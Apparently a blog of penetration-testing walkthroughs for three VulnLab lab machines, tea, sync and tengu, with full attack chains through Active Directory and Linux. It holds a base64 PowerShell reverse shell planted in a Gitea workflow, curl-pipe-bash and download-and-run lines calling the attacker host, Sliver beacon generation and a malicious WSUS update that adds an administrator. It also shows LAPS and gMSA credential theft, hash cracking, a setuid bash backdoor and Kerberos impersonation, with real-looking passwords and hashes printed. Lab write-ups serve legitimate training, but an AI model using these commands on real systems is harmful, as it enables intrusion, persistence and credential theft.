vulnlab-tea

vulnlab-tea

a medium rated AD chain machine, involved srv.tea.vl having an instance of gitea running which had an active runner, being able to register a user and enable actions on the repo, we can execute commands to get a reverse shell, -> Get-LapsADPassword -> SharpWSUS.exe -> domain admin on dc.tea.vl.

.

giteabuild

Create .gitea/workflows/demo.yaml file in the repository that we have created.

http://srv.tea.vl:3000/puck/puck/src/branch/main/.gitea/workflows/demo.yaml

name: Build
run-name: ${{ gitea.actor }} running build job
on: [push]

jobs:
  Explore-Gitea-Actions:
    runs-on: windows-latest
    steps:
      - run: echo "🍏 This job's status is ${{ job.status }}."
      - run: powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AOAAuADIALgAxADMAOAAiACwANAA0ADMAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA

catch with netcat

┌──(puck㉿kali)-[~/vulnlab/tea]
└─$ rlwrap nc -nlvp 443                         
listening on [any] 443 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.191.134] 50061

PS C:\Users\thomas.wallace\.cache\act\63805091085fb29f\hostexecutor> whoami
tea\thomas.wallace

download & execute Beacon

PS C:\_install> iwr http://10.8.2.138:8000/beacon.exe -o beacon.exe
PS C:\_install> PS C:\_install> ./beacon.exe

Sliver

┌──(puck㉿kali)-[~/vulnlab/tea]
└─$ sliver                    
Connecting to localhost:31337 ...
[*] Loaded 21 aliases from disk
[*] Loaded 128 extension(s) from disk

    ███████╗██╗     ██╗██╗   ██╗███████╗██████╗
    ██╔════╝██║     ██║██║   ██║██╔════╝██╔══██╗
    ███████╗██║     ██║██║   ██║█████╗  ██████╔╝
    ╚════██║██║     ██║╚██╗ ██╔╝██╔══╝  ██╔══██╗
    ███████║███████╗██║ ╚████╔╝ ███████╗██║  ██║
    ╚══════╝╚══════╝╚═╝  ╚═══╝  ╚══════╝╚═╝  ╚═╝

All hackers gain vigilance
[*] Server v1.5.42 - 85b0e870d05ec47184958dbcb871ddee2eb9e3df
[*] Welcome to the sliver shell, please type 'help' for options

[*] Check for updates with the 'update' command

sliver > https --lport 8443

[*] Starting HTTPS :8443 listener ...

[*] Successfully started job #1

   
sliver > jobs

 ID   Name    Protocol   Port   Stage Profile 
==== ======= ========== ====== ===============
 1    https   tcp        8443                 


sliver > generate beacon --seconds 5 --jitter 3 --os windows --arch amd64 --format EXECUTABLE --http 10.8.2.138:8443 --name tea-3 --save /tmp/beacon.exe -G --skip-symbols

[*] Generating new windows/amd64 beacon implant binary (5s)
[!] Symbol obfuscation is disabled
[*] Build completed in 2s
[*] Implant saved to /tmp/beacon.exe

sliver > jobs

 ID   Name    Protocol   Port   Stage Profile 
==== ======= ========== ====== ===============
 1    https   tcp        8443                 

[*] Beacon 9d553a10 tea-3 - 10.10.191.134:50348 (SRV) - windows/amd64 - Tue, 20 Aug 2024 10:25:18 CEST

sliver > use 9d553a10

[*] Active beacon tea-3 (9d553a10-504e-4b41-927f-34a21b1a94bc)

sliver (tea-3) > ls

[*] Tasked beacon tea-3 (2cdcbb9d)

[+] tea-3 completed task 2cdcbb9d

C:\_install (6 items, 24.0 MiB)
===============================
-rw-rw-rw-  beacon.exe                 10.5 MiB   Tue Aug 20 01:16:47 -0700 2024
-rw-rw-rw-  beacon2.exe                10.5 MiB   Tue Aug 20 01:24:56 -0700 2024
-rw-rw-rw-  LAPS.x64.msi               1.1 MiB    Sun Dec 24 06:37:30 -0700 2023
-rw-rw-rw-  LAPS_OperationsGuide.docx  626.3 KiB  Sun Dec 24 06:37:39 -0700 2023
-rw-rw-rw-  PsExec64.exe               813.9 KiB  Sun Oct 22 06:03:38 -0700 2023
-rw-rw-rw-  PsInfo64.exe               523.4 KiB  Sun Dec 24 06:38:30 -0700 2023



sliver (tea-3) > sharp-hound-4 -i -s -t 120 -- -c all,gpolocalgroup

[*] Tasked beacon tea-3 (6338fcbb)

[+] tea-3 completed task 6338fcbb

[*] sharp-hound-4 output:
2024-08-20T01:27:54.2810142-07:00|INFORMATION|This version of SharpHound is compatible with the 5.0.0 Release of BloodHound
2024-08-20T01:27:54.9376664-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, UserRights, CARegistry, DCRegistry, CertServices
--snip--
2024-08-20T01:28:41.7584223-07:00|INFORMATION|Status: 309 objects finished (+309 6.866667)/s -- Using 69 MB RAM
2024-08-20T01:28:41.7687327-07:00|INFORMATION|Enumeration finished in 00:00:45.8844244
2024-08-20T01:28:41.8847345-07:00|INFORMATION|Saving cache with stats: 250 ID to type mappings.
 254 name to SID mappings.
 2 machine sid mappings.
 2 sid to domain mappings.
 0 global catalog mappings.
2024-08-20T01:28:41.9476974-07:00|INFORMATION|SharpHound Enumeration Completed at 1:28 AM on 8/20/2024! Happy Graphing!

[*] Output saved to /tmp/sharp-hound-4_.3130027413.log

sliver (tea-3) > ls

[*] Tasked beacon tea-3 (3f00e892)

[+] tea-3 completed task 3f00e892

C:\_install (8 items, 24.0 MiB)
===============================
-rw-rw-rw-  20240820012840_BloodHound.zip                         23.2 KiB   Tue Aug 20 01:28:41 -0700 2024
-rw-rw-rw-  beacon.exe                                            10.5 MiB   Tue Aug 20 01:16:47 -0700 2024
-rw-rw-rw-  beacon2.exe                                           10.5 MiB   Tue Aug 20 01:24:56 -0700 2024
-rw-rw-rw-  LAPS.x64.msi                                          1.1 MiB    Sun Dec 24 06:37:30 -0700 2023
-rw-rw-rw-  LAPS_OperationsGuide.docx                             626.3 KiB  Sun Dec 24 06:37:39 -0700 2023
-rw-rw-rw-  NjdkNDliNTgtOWQ5Mi00ZTViLWI2NzctOWJlODE4OTM4ZGMy.bin  42.8 KiB   Tue Aug 20 01:28:41 -0700 2024
-rw-rw-rw-  PsExec64.exe                                          813.9 KiB  Sun Oct 22 06:03:38 -0700 2023
-rw-rw-rw-  PsInfo64.exe                                          523.4 KiB  Sun Dec 24 06:38:30 -0700 2023


sliver (tea-3) > download 20240820012840_BloodHound.zip

[*] Tasked beacon tea-3 (d8c023fe)

[+] tea-3 completed task d8c023fe

[*] Wrote 23731 bytes (1 file successfully, 0 files unsuccessfully) to /home/puck/vulnlab/tea/20240820012840_BloodHound.zip

sliver (tea-3) >  

                                                                                                                     
┌──(puck㉿kali)-[~/vulnlab/tea]

.

sliver (tea-3) > interactive

[*] Using beacon's active C2 endpoint: https://10.8.2.138:8443
[*] Tasked beacon tea-3 (d48d0ac7)

[*] Session 67a7541b tea-3 - 10.10.163.246:53086 (SRV) - windows/amd64 - Thu, 22 Aug 2024 09:21:51 CEST

sliver (tea-3) > use 67a7541b-db54-4c92-a36a-b6baec828a14

[*] Active session tea-3 (67a7541b-db54-4c92-a36a-b6baec828a14)

sliver (tea-3) > shell

? This action is bad OPSEC, are you an adult? Yes

[*] Wait approximately 10 seconds after exit, and press <enter> to continue
[*] Opening shell tunnel (EOF to exit) ...

[*] Started remote shell with pid 4600

PS C:\_install> Get-LAPSADPassword -Identity SRV -AsPlainText

Get-LAPSADPassword -Identity SRV -AsPlainText

ComputerName        : SRV
DistinguishedName   : CN=SRV,OU=Servers,DC=tea,DC=vl
Account             : Administrator
Password            : %t50Z))o4+0Z;6
PasswordUpdateTime  : 8/21/2024 11:53:03 PM
ExpirationTimestamp : 9/20/2024 11:53:03 PM
Source              : EncryptedPassword
DecryptionStatus    : Success
AuthorizedDecryptor : TEA\Server Administration

PS C:\_install> 

.

.

netexec winrm srv.tea.vl -u administrator -p 'rr<redacted>S9' --local
WINRM       10.10.191.134   5985   SRV              [*] Windows Server 2022 Build 20348 (name:SRV) (domain:tea.vl)
WINRM       10.10.191.134   5985   SRV              [+] SRV\administrator:rr<redacted>S9 (Pwn3d!)

.

evil-winrm -i srv.tea.vl -u administrator -p 'rr<redacted>S9'

or

xfreerdp /u:Administrator /p:rr<redacted>S9 /w:1566 /h:968 /v:srv.tea.vl:3389

not finished yet

iwr http://10.8.2.138:8000/SharpWSUS.exe -o sharpwsus.exe

.

SharpWSUS

sharpwsus locate

sharpwsus inspect

sharpwsus create /payload:"C:\Users\Administrator\Documents\psexec64.exe" /args:"-accepteula -s -d cmd.exe /c \\"net user puck Password123! /add && net localgroup administrators puck /add \"" /title:"Great UpdateC21" /date:2024-08-23 /kb:700123 /rating:Important /description:"Really important update" /url:"https://google.com"

sharpwsus approve /updateid:9e21a26a-1cbe-4145-934e-d8395acba567 /computername:dc.tea.vl /groupname:"Awesome Group C2"

sharpwsus check /updateid:9e21a26a-1cbe-4145-934e-d8395acba567 /computername:dc.tea.vl

sharpwsus delete /updateid:9e21a26a-1cbe-4145-934e-d8395acba567 /computername:dc.tea.vl /groupname:"Awesome Group C2"

.

.

C:\_install>sharpwsus create /payload:"C:\Users\Administrator\Documents\psexec64.exe" /args:"-accepteula -s -d cmd.exe /c \\"net user puck Password123! /add && net localgroup administrators puck /add \"" /title:"Great UpdateC21"

 ____  _                   __        ______  _   _ ____
/ ___|| |__   __ _ _ __ _ _\ \      / / ___|| | | / ___|
\___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \
 ___) | | | | (_| | |  | |_) \ V  V /  ___) | |_| |___) |
|____/|_| |_|\__,_|_|  | .__/ \_/\_/  |____/ \___/|____/
                       |_|
           Phil Keeble @ Nettitude Red Team

[*] Action: Create Update
C:\WSUS-Updates\WsusContent
[*] Creating patch to use the following:
[*] Payload: psexec64.exe
[*] Payload Path: C:\Users\Administrator\Documents\psexec64.exe
[*] Arguments: -accepteula -s -d cmd.exe /c \net
[*] Arguments (HTML Encoded): -accepteula -s -d cmd.exe /c \net

################# WSUS Server Enumeration via SQL ##################
ServerName, WSUSPortNumber, WSUSContentLocation
-----------------------------------------------
SRV, 8530, C:\WSUS-Updates\WsusContent

ImportUpdate
Update Revision ID: 198781
PrepareXMLtoClient
InjectURL2Download
DeploymentRevision
PrepareBundle
PrepareBundle Revision ID: 198782
PrepareXMLBundletoClient
DeploymentRevision

[*] Update created - When ready to deploy use the following command:
[*] SharpWSUS.exe approve /updateid:2aff56d0-6c1c-48ab-ac73-ab0483182818 /computername:Target.FQDN /groupname:"Group Name"

[*] To check on the update status use the following command:
[*] SharpWSUS.exe check /updateid:2aff56d0-6c1c-48ab-ac73-ab0483182818 /computername:Target.FQDN

[*] To delete the update use the following command:
[*] SharpWSUS.exe delete /updateid:2aff56d0-6c1c-48ab-ac73-ab0483182818 /computername:Target.FQDN /groupname:"Group Name"

[*] Create complete

There is no such global user or group: puck.

There is no such global user or group: " /title:Great.

There is no such global user or group: UpdateC21.

More help is available by typing NET HELPMSG 3783.



C:\_install>SharpWSUS.exe approve /updateid:2aff56d0-6c1c-48ab-ac73-ab0483182818 /computername:dc.tea.vl /groupname:"Group1"

 ____  _                   __        ______  _   _ ____
/ ___|| |__   __ _ _ __ _ _\ \      / / ___|| | | / ___|
\___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \
 ___) | | | | (_| | |  | |_) \ V  V /  ___) | |_| |___) |
|____/|_| |_|\__,_|_|  | .__/ \_/\_/  |____/ \___/|____/
                       |_|
           Phil Keeble @ Nettitude Red Team

[*] Action: Approve Update
C:\WSUS-Updates\WsusContent

Targeting dc.tea.vl
TargetComputer, ComputerID, TargetID
------------------------------------
dc.tea.vl, 216d99cd-2257-41e7-9687-2163fb7e39f7, 1
Group Exists = False
Group Created: Group1
Added Computer To Group
Approved Update

[*] Approve complete


C:\_install>

 

.

┌──(puck㉿kali)-[~/vulnlab]
└─$ netexec smb dc.tea.vl -u puckie -p 'Start123!'
SMB         10.10.145.21    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:tea.vl) (signing:True) (SMBv1:False)
SMB         10.10.145.21    445    DC               [+] tea.vl\puckie:Start123! (Pwn3d!)

.

Finaly

xfreerdp /u:puckie /p:'Start123!' /w:1566 /h:968 /v:dc.tea.vl:3389

.

catch the hashes

impacket-secretsdump 'tea/puckie:Start123!@dc.tea.vl' > allhashes.txt

 

This was super fun.

.

 

vulnlab-sync

vulnlab sync

an easy linux box

nmap scan

# Nmap 7.93 scan initiated Mon Aug 19 11:03:10 2024 as: nmap -A -oN sync.nmap 10.10.93.172
Nmap scan report for 10.10.93.172
Host is up (0.023s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT    STATE SERVICE VERSION
21/tcp  open  ftp     vsftpd 3.0.5
22/tcp  open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 4b1533cc6cce0953f8f37d3b082785fa (ECDSA)
|_  256 18fd36c6a505b196147283f862d53821 (ED25519)
80/tcp  open  http    Apache httpd 2.4.52 ((Ubuntu))
|_http-title: Login
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.52 (Ubuntu)
873/tcp open  rsync   (protocol version 31)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Aug 19 11:03:18 2024 -- 1 IP address (1 host up) scanned in 8.51 seconds

rsync enum

rsync -av --list-only rsync://10.10.93.172/

using rsync getting the source file of website

rsync -av rsync://10.10.93.172:873/httpd ./rsyn_shared

.

found that the hash is combination of three things $secure|$username|$password here the secure hash is working as salt

a0de4d7f81676c3ea9eabcadfd2536f6:6c4972f3717a5e881e282ad3105de01e|triss|

hashcat can crack this one

hashcat -a 0 -m 20 hash.txt /usr/share/wordlists/rockyou.txt -o crackedtriss.txt

We can now ftp to the box ,make a folder .ssh , and upload there our authorized_keys file (id_rsa.pub)

┌──(puck㉿kali)-[~/vulnlab/sync]
└─$ ftp 10.10.93.172      
Connected to 10.10.93.172.
220 (vsFTPd 3.0.5)
Name (10.10.93.172:puck): triss
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
229 Entering Extended Passive Mode (|||41121|)
150 Here comes the directory listing.
drwxr-x---    2 1003     1003         4096 Apr 21  2023 .
drwxr-x---    2 1003     1003         4096 Apr 21  2023 ..
lrwxrwxrwx    1 0        0               9 Apr 21  2023 .bash_history -> /dev/null
-rw-r--r--    1 1003     1003          220 Apr 19  2023 .bash_logout
-rw-r--r--    1 1003     1003         3771 Apr 19  2023 .bashrc
-rw-r--r--    1 1003     1003          807 Apr 19  2023 .profile
226 Directory send OK.
ftp> mkdir .ssh
257 "/.ssh" created
ftp> cd .ssh
250 Directory successfully changed.
ftp> put authorized_keys
local: authorized_keys remote: authorized_keys
229 Entering Extended Passive Mode (|||6569|)
150 Ok to send data.
100% |************************************************************************|    91      612.87 KiB/s    00:00 ETA
226 Transfer complete.
91 bytes sent in 00:00 (2.32 KiB/s)
ftp> ls
229 Entering Extended Passive Mode (|||65353|)
150 Here comes the directory listing.
-rw-------    1 1003     1003           91 Aug 19 09:11 authorized_keys
226 Directory send OK.

.

ssh  -i ed_25519 triss@10.10.93.172

found a user in /etc/paswwd jenifier ,  su jennifer (with same pass as triss)

there is a zip file in the /backup directory that is  a backup owned by root.

timeout 60s ./pspy64

getting the zip

wget http://10.8.2.138:8000/1698154321.zip

unshadow

$ unshadow passwd shadow > unshadow

crack it

john --wordlist=/usr/share/wordlists/rockyou.txt --format=crypt unshadow

User sa has write permission to this shell script.

echo "chmod +s /bin/bash" >> /usr/local/bin/backup.sh
cat /usr/local/bin/backup.sh
#!/bin/bash

mkdir -p /tmp/backup
cp -r /opt/httpd /tmp/backup
cp /etc/passwd /tmp/backup
cp /etc/shadow /tmp/backup
cp /etc/rsyncd.conf /tmp/backup
zip -r /backup/$(date +%s).zip /tmp/backup
rm -rf /tmp/backup
chmod +s /bin/bash

wait a minute

/bin/bash -p
bash-5.1# id
uid=1001(sa) gid=1001(sa) euid=0(root) egid=0(root) groups=0(root),1001(sa)
bash-5.1#

that’s all

 

 

vulnlab-tengu

vulnlab-tengu

a medium chain containing a ubuntu vm , a sql.tengu.vl and a  dc.tengu.vl ( all domain djoined)

noderedsh.py -> extracted krb5keytab- read gMSA -> delegate ->login to mssqlclient.py impersonate ->read pass domain admin pass with SharpDPAPI

node-red exploit [initial access]

a web service running named Node-RED on port 1880 which does not require authentication. We make a flow which executes a reverse shell on the target system:

┌──(puck㉿kali)-[~/vulnlab/tengu]
└─$ python3 noderedsh.py http://10.10.139.247:1880
[+] Node-RED does not require authentication.
[+] Establishing RCE link ....
> whoami
nodered_svc
curl http://10.8.2.138/s.sh | bash

.

python3 -m http.server 80          
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.139.247 - - [09/Aug/2024 14:21:42] "GET /s.sh HTTP/1.1" 200 -

.

┌──(puck㉿kali)-[~/vulnlab/tengu]
└─$ nc -nlvp 9001       
listening on [any] 9001 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.139.247] 48442
sh: 0: can't access tty; job control turned off
$ whoami
nodered_svc
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
nodered_svc@nodered:/opt/nodered/.node-red$ export TERM=xterm
export TERM=xterm
nodered_svc@nodered:/opt/nodered/.node-red$ 
zsh: suspended  rlwrap nc -nlvp 443

.

┌──(puck㉿kali)-[~/vulnlab/tengu]
└─$ stty raw -echo;fg
[1]  + continued  rlwrap nc -nlvp 443
nodered_svc@nodered:/opt/nodered/.node-red$ 
nodered_svc@nodered:/tmp$ wget http://10.8.2.138/chisel
nodered_svc@nodered:/tmp$ chmod +x chisel
nodered_svc@nodered:/tmp$ ./chisel client 10.8.2.138:8000 R:socks

.

┌──(puck㉿kali)-[~/vulnlab/tengu]
└─$ chisel server -p 8000 --reverse 
2024/08/14 09:18:49 server: Reverse tunnelling enabled
2024/08/14 09:18:49 server: Fingerprint DGcMxm0MtWpKPEJ5EPKN8UyvmAiowDGpTHgWZHQCdOc=
2024/08/14 09:18:49 server: Listening on http://0.0.0.0:8000
2024/08/14 09:20:49 server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening

.

┌──(puck㉿kali)-[~/vulnlab/tengu]
└─$ proxychains crackmapexec mssql sql.tengu.vl -u nodered_connector -p 'DreamPuppy<redacted25>' --local-auth 
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  sql.tengu.vl:1433  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  sql.tengu.vl:445  ...  OK
MSSQL       sql.tengu.vl    1433   SQL              [*] Windows Server 2022 Build 20348 (name:SQL) (domain:SQL)
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  sql.tengu.vl:1433  ...  OK
MSSQL       sql.tengu.vl    1433   SQL              [+] nodered_connector:DreamPuppy<redacted>25 

.

┌──(puck㉿kali)-[~/vulnlab/tengu]
└─$ proxychains4 sqsh -S 10.10.139.246 -U 'nodered_connector' -P 'DreamPuppy<redacted>25'  
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
sqsh-2.5.16.1 Copyright (C) 1995-2001 Scott C. Gray
Portions Copyright (C) 2004-2014 Michael Peppler and Martin Wesdorp
This is free software with ABSOLUTELY NO WARRANTY
For more information type '\warranty'
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.139.246:1433  ...  OK
1> show databases;
2> use prod;
3> go
Msg 911, Level 16, State 1
Server 'SQL', Line 2
Database 'prod' does not exist. Make sure that the name is entered correctly.
1> select table_name from systable
2> go
Msg 208, Level 16, State 1
Server 'SQL', Line 1
Invalid object name 'systable'.
1> SELECT * FROM Dev.INFORMATION_SCHEMA.TABLES;
2> go -m vert
TABLE_CATALOG: Dev
TABLE_SCHEMA:  dbo
TABLE_NAME:    Task
TABLE_TYPE:    BASE TABLE
 
(1 row affected)
1> 

...
1> SELECT name FROM master.dbo.sysdatabases;
2> go -m vert
name: master
 
name: tempdb
 
name: model
 
name: msdb
 
name: Demo
 
name: Dev
 
(6 rows affected)
1> use Demo;
2> go
1> select * from users;
2> go -m vert
ID:       NULL
Username: t2_m.winters
Password: af9cfa9b70e5e90984203087e5a5219945a599abf31dd4bb2a11dc20678ea147
 
(1 row affected)
1> 

.

crackstation.net
resolves  this hash to Tengu123

Checking credentials

┌──(puck㉿kali)-[~/vulnlab/tengu]
└─$ proxychains4 -q crackmapexec ldap dc.tengu.nl -u 't2_m.winters' -p 'Tengu123'         
SMB         dc.tengu.nl     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:tengu.vl) (signing:True) (SMBv1:False)
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  DC.tengu.vl:389  ...  OK
LDAP        dc.tengu.nl     389    DC               [+] tengu.vl\t2_m.winters:Tengu123 

 

Getting krb5.keytab

As this box is domaind joined, we are able to extract the machine ntlm hash from /etc/krb5.keytab by using https://github.com/sosdave/KeyTabExtract

┌──(puck㉿kali)-[~/vulnlab/tengu]
└─$ python3 keytabextract.py krb5.keytab
[*] RC4-HMAC Encryption detected. Will attempt to extract NTLM hash.
[*] AES256-CTS-HMAC-SHA1 key found. Will attempt hash extraction.
[*] AES128-CTS-HMAC-SHA1 hash discovered. Will attempt hash extraction.
[+] Keytab File successfully imported.
    REALM : TENGU.VL
    SERVICE PRINCIPAL : NODERED$/
    NTLM HASH : d4210ee2db0c03aa3611c9ef8a4dbf49
    AES-256 HASH : 4ce11c580289227f38f8cc0225456224941d525d1e525c353ea1e1ec83138096
    AES-128 HASH : 3e04b61b939f61018d2c27d4dc0b385f

 

.

 

proxychains4 bloodhound-python -d tengu.vl -c all -u t2_m.winters -p Tengu123 -ns 10.10.219.229 --dns-tcp --zip

In Bloodhound we find he machine account NODERED$ has the permission ReadGMSAPassword

We can use netexec to retrieve the NTLM Hash for the account gMSA01$

──(puck㉿kali)-[~/vulnlab/tengu]
└─$ proxychains4 netexec ldap dc.tengu.vl -u 'NODERED$' -H d4210ee2db0c03aa3611c9ef8a4dbf49 --gmsa 
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  dc.tengu.vl:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  dc.tengu.vl:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  dc.tengu.vl:636  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  dc.tengu.vl:135  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  dc.tengu.vl:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  dc.tengu.vl:445  ...  OK
SMB         224.0.0.1       445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:tengu.vl) (signing:True) (SMBv1:False)
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  dc.tengu.vl:636  ...  OK
LDAPS       224.0.0.1       636    DC               [+] tengu.vl\NODERED$:d4210ee2db0c03aa3611c9ef8a4dbf49 
LDAPS       224.0.0.1       636    DC               [*] Getting GMSA Passwords
LDAPS       224.0.0.1       636    DC               Account: gMSA01$              NTLM: d4b65861e85773fba2035b31ebcacb37
LDAPS       224.0.0.1       636    DC               Account: gMSA02$              NTLM: 

 

we notice that we can delegate permissions as this account

┌──(puck㉿kali)-[~/vulnlab/tengu]
└─$ proxychains4 -q impacket-findDelegation 'tengu.vl/nodered$:@dc.tengu.vl' -hashes :d4210ee2db0c03aa3611c9ef8a4dbf49 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

AccountName  AccountType                          DelegationType                      DelegationRightsTo         
-----------  -----------------------------------  ----------------------------------  --------------------------
gMSA01$      ms-DS-Group-Managed-Service-Account  Constrained w/ Protocol Transition  MSSQLSvc/SQL:1433          
gMSA01$      ms-DS-Group-Managed-Service-Account  Constrained w/ Protocol Transition  MSSQLSvc/sql.tengu.vl:1433 
gMSA01$      ms-DS-Group-Managed-Service-Account  Constrained w/ Protocol Transition  MSSQLSvc/sql.tengu.vl      
gMSA01$      ms-DS-Group-Managed-Service-Account  Constrained w/ Protocol Transition  MSSQLSvc/sql               

In bloodhound we will find a SQL_Admins group which contains two users, next we try to impersonate as one of these users

getting the ticket

.

┌──(puck㉿kali)-[~/vulnlab/tengu]
└─$ proxychains4 netexec ldap dc.tengu.vl -u 'NODERED$' -H d4210ee2db0c03aa3611c9ef8a4dbf49 --gmsa
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  dc.tengu.vl:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  dc.tengu.vl:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  dc.tengu.vl:636  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  dc.tengu.vl:135  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  dc.tengu.vl:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  dc.tengu.vl:445  ...  OK
SMB         224.0.0.1       445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:tengu.vl) (signing:True) (SMBv1:False)
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  dc.tengu.vl:636  ...  OK
LDAPS       224.0.0.1       636    DC               [+] tengu.vl\NODERED$:d4210ee2db0c03aa3611c9ef8a4dbf49 
LDAPS       224.0.0.1       636    DC               [*] Getting GMSA Passwords
LDAPS       224.0.0.1       636    DC               Account: gMSA01$              NTLM: d4b65861e85773fba2035b31ebcacb37
LDAPS       224.0.0.1       636    DC               Account: gMSA02$              NTLM: 
                                                                                                                             
┌──(puck㉿kali)-[~/vulnlab/tengu]
└─$ proxychains4 impacket-getST -spn 'MSSQLSvc/sql.tengu.vl' 'tengu.vl/GMSA01$@sql.tengu.vl' -hashes :d4b65861e85773fba2035b31ebcacb37 -dc-ip 10.10.185.21 -impersonate 't1_m.winters'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.185.21:88  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.185.21:88  ...  OK
[*] Impersonating t1_m.winters
[*] Requesting S4U2self
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.185.21:88  ...  OK
[*] Requesting S4U2Proxy
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.185.21:88  ...  OK
[*] Saving ticket in t1_m.winters@MSSQLSvc_sql.tengu.vl@TENGU.VL.ccache
                                                                                                                             
┌──(puck㉿kali)-[~/vulnlab/tengu]

.

